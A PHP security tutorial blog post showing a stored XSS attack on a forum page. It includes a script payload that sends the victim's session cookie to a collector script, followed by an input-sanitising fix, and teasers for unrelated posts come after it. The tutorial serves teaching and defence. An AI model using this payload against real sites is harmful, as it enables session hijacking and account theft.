Avançar para o conteúdo principal

Security in PHP web pages - Part 2

Por
In the second part of this series of articles we will explore a forum-style message page to make a session hijacking attack.

First the page code is as follows:

Now the problem: the page input is not checked for the existence of potentially dangerous characters, so the page allows the execution of javascript.

In addition to small jokes that may be attempted, such as opening popups or redirecting the browser to other pages, the page is vulnerable to another type of attack that allows you to capture the session cookie and send it to another server. Is this the kind of attack we are going to demonstrate here.

With the following code inserted in the inputbox for the message we are going to have the browser try to open an image, which is actually a PHP script that will rescue the session cookie:

<script>document.write('<img src="http://localhost:8088/login/submitcookie.php?cookie='+escape(document.cookie)+'"/>');</script>

The PHP code that will capture the cookie is as follows:

In this case the code will create a text file with the value of the cookie, allowing the current session of the user can be captured by simply injecting this cookie into the browser of the attacker.

To make the page safe it is necessary to validate the input, for this we can create a function:
function test_input($data) {
$data = trim($data);
$data = stripslashes($data);
$data = htmlspecialchars($data);
return $data;
}
(code from www.w3schools.com)

Of course we should also use parameters instead of concatenated strings for SQL code.


Comentários

Enviar um comentário

Mensagens populares deste blogue

Single Page App with C# WPF/XAML

Por
 In this post we are going to create a single page app. The app will have multiple pages that get rendered in the main window. We will be using Visual Studio, C#, WPF and XAML. Let's start by creating a new project in Visual Studio of this type: Next, in the MainWindow, we define the interface structure. On the left side we place a menu and on the right side a DockPanel with a Frame in it. The Frame is the element that is used to render de pages content. Now let's add the new pages. In this example I will add two pages. Click in the Solution Explorer with the mouse right button, then choose Add and Page. The project looks like this. The app content goes on the recently create pages. Because this is just an example I will just change the background color and add a small text. Page1 Page2 Finally the code. Back to the MainWindow we need to create the click events on the menu items. So, in the MenuItem line add the click event and pick New Event Handler. If that option doesn't...
Enviar um comentário
Ler mais

Saving pictures to an Access database

Por
What is the best method for storing images in a server? That's a discussion that we will never see the end. In my opinion, has in everything in life, it depends. But in this post we will not contribute to that dilemma. The objective of this post is to show how to store the pictures in an Access database. We start by creating a new project in VS 2013. Next, we create a class that will manage the database. In this class we will need a reference to a DLL that is responsible for creating the database file. In the Reference Manager with search in the COM section.    Back in the class with add a namespace: using ADOX; Now let's add three properties to the class: the path to the database file, a connection string and an object to make the connection with the database. class BaseDados     {         string caminhoBD;         string strLigacao;         OleDbConnection ...
Enviar um comentário
Ler mais

Upgrading Windows 10 Home to Pro

Por
 So I have been thinking about upgrading my Windows 10 Home Edition to the Pro version, but I always get to the point where it seems that I had to reinstall the entire SO and quit. After some investigating I have done it this way: - following this post  on the microsoft site I use one of the default keys for Windows 10 Pro and went to Settings > Update & Security > Activation > Change the product key; - next, Windows will activate the Pro functionalities and asks to restart; - now you have the Pro version but it's not activated, so you have to buy a Windows Pro Key. I went to UR cdkeys  and bought a key for less then €20; - and with the new key went to Change the product key and activated; - and it's done. Disclaimer : I have nothing to do with UR cdkeys so you can use any site to buy you cd key and your experience may vary from mine.
Enviar um comentário
Ler mais